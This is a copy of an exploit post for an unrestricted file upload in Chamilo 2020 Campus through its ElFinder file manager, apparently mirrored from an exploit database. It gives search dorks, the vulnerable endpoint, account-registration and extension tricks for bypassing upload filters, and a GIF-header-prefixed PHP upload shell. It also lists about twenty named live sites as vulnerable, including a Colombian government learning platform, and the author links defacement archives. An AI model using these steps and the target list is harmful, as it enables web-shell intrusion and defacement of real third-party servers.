Advertisement






Chamilo © 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability

CVE Category Price Severity
N/A CWE-434 N/A High
Author Risk Exploitation Type Date
N/A High/Exploitable Remote 2020-05-27
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050204

Below is a copy:

Chamilo 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability
####################################################################

# Exploit Title : Chamilo  2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 27 May 2020
# Vendor Homepage : campus.chamilo.org
# Software Version : 1 and 1.x.x etc...
# Software Download Link : chamilo.org/en/download/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Powered by Chamilo  2020 site:com
# Vulnerability Type : 
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 Permissions, Privileges, and Access Controls
CAPEC-650 [ Upload a Web Shell to a Web Server ]
CAPEC-17 [ Using Malicious Files ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/KingSkrupellos
# Zone-H : zone-h.org/archive/notifier=KingSkrupellos
zone-h.org/archive/notifier=CyBeRiZM
# Mirror-H : mirror-h.org/search/hacker/948/
mirror-h.org/search/hacker/94/
mirror-h.org/search/hacker/1826/
# Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
defacer.id/archive/team/Cyberizm-Org
# Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
# Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
aljyyosh.org/hacker.php?id=Cyberizm.Org
aljyyosh.org/hacker.php?id=Cyberizm
# Zone-D : zone-d.org/attacker/id/69
# Pastebin : pastebin.com/u/KingSkrupellos
# Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities

####################################################################

# Impact :
***********
This Software is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible.

CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
*********************************************************
The software allows the attacker to upload or transfer files of dangerous types that 
can be automatically processed within the product's environment.

CWE-264 Permissions, Privileges, and Access Controls
****************************************************
Weaknesses in this category are related to the management of 
permissions, privileges, and other security features that are used 
to perform access control.

CAPEC-650 [ Upload a Web Shell to a Web Server ]
*********************************************************
By exploiting insufficient permissions, it is possible to upload a web shell to a web server in
 such a way that it can be executed remotely. This shell can have various capabilities, thereby acting 
as a "gateway" to the underlying web server. The shell might execute at the higher permission level 
of the web server, providing the ability the execute malicious code at elevated levels.

CAPEC-17 [ Using Malicious Files ]
*******************************
An attack of this type exploits a system's configuration that allows an attacker to either directly 
access an executable file, for example through shell access; or in a possible worst case allows 
an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented
 middleware systems which have many integration points are particularly vulnerable, because 
both the programmers and the administrators must be in synch regarding the interfaces 
and the correct privileges for each interface.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

Important Note :  Ministry of Commerce Industry and Tourism Colombia [ mincit.gov.co ] is vulnerable. 

If says to you : 

Unable to connect to backend. 
Invalid backend configuration.
Readable volumes not available.

Then Register yourself with Admin or Author Account. 

/main/auth/inscription.php

Then you can use File Upload and Shell the sites with .php.gif or php.pjpg

Use your Brain :)

Vulnerability ScreenShot Proof  => 

https://www.upload.ee/image/11775401/mincitgovcoexploitelfinder27520.png

https://www.upload.ee/image/11775402/elfinderexploit27052020.png

Upload your shell in gif format and then rename the format 

# if the rename function was disabled and add this  GIF89;aGIF89;aGIF89;a   before <?PHP
# Example

GIF89;aGIF89;aGIF89;a<html>
 <head>
  <title>PHP Test</title>
  <form action="" method="post" enctype="multipart/form-data">
  <input type="file" name="fileToUpload" id="fileToUpload">
  <input type="submit" value="upload file" name="submit">
  </form>
 </head>
 <body>
 <?php echo '<p>FILE UPLOAD</p><br>';
 $tgt_dir = "uploads/";
 $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
 echo "<br>TARGET FILE= ".$tgt_file;
 //$filename = $_FILES['fileToUpload']['name'];
 echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
 if(isset($_POST['submit']))
 {
 if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
    { echo "<br>file exists, try with another name"; }
 else   {
         echo "<br>STARTING UPLOAD PROCESS<br>";
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
        { echo "<br>File UPLOADED:- ".$tgt_file; }

          else  { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
    }
 }
?>
 </body>
</html>

Directory File Path :
**********************
/app/upload/users/[ID-NUMBER]/[YOUR-NUMBER-ID]/my_files/[YOURFILENAME].html

[PATH]/my_files/[YOURFILENAME].html

####################################################################

# Example Vulnerable Sites :
************************
[+] campus.chamilo.org/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] universidadsorjuanaines.edu.mx/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] bimwerxacademy.com/lms//main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] mapsnetwork.eu/elearning/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] vle.minerva.bg/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] chamilo.etf.edu/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] petrogasplus.com/chamilo//main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] cloud.octagonafrica.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] dsitello.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] stocksniperacademy.com/lms/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] margaridaschool.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] loreelorza.com/Academia/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] aulavirtual.unitylanguageschool.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] lms.mincit.gov.co/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] admejoresseguridadsig.com/aulas/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] chamilo-miage-toulouse.northeurope.cloudapp.azure.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] froggyspeak.net/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

[+] campus.adesa-asesoria.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

[+] saint-cricq.com/TSTC/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum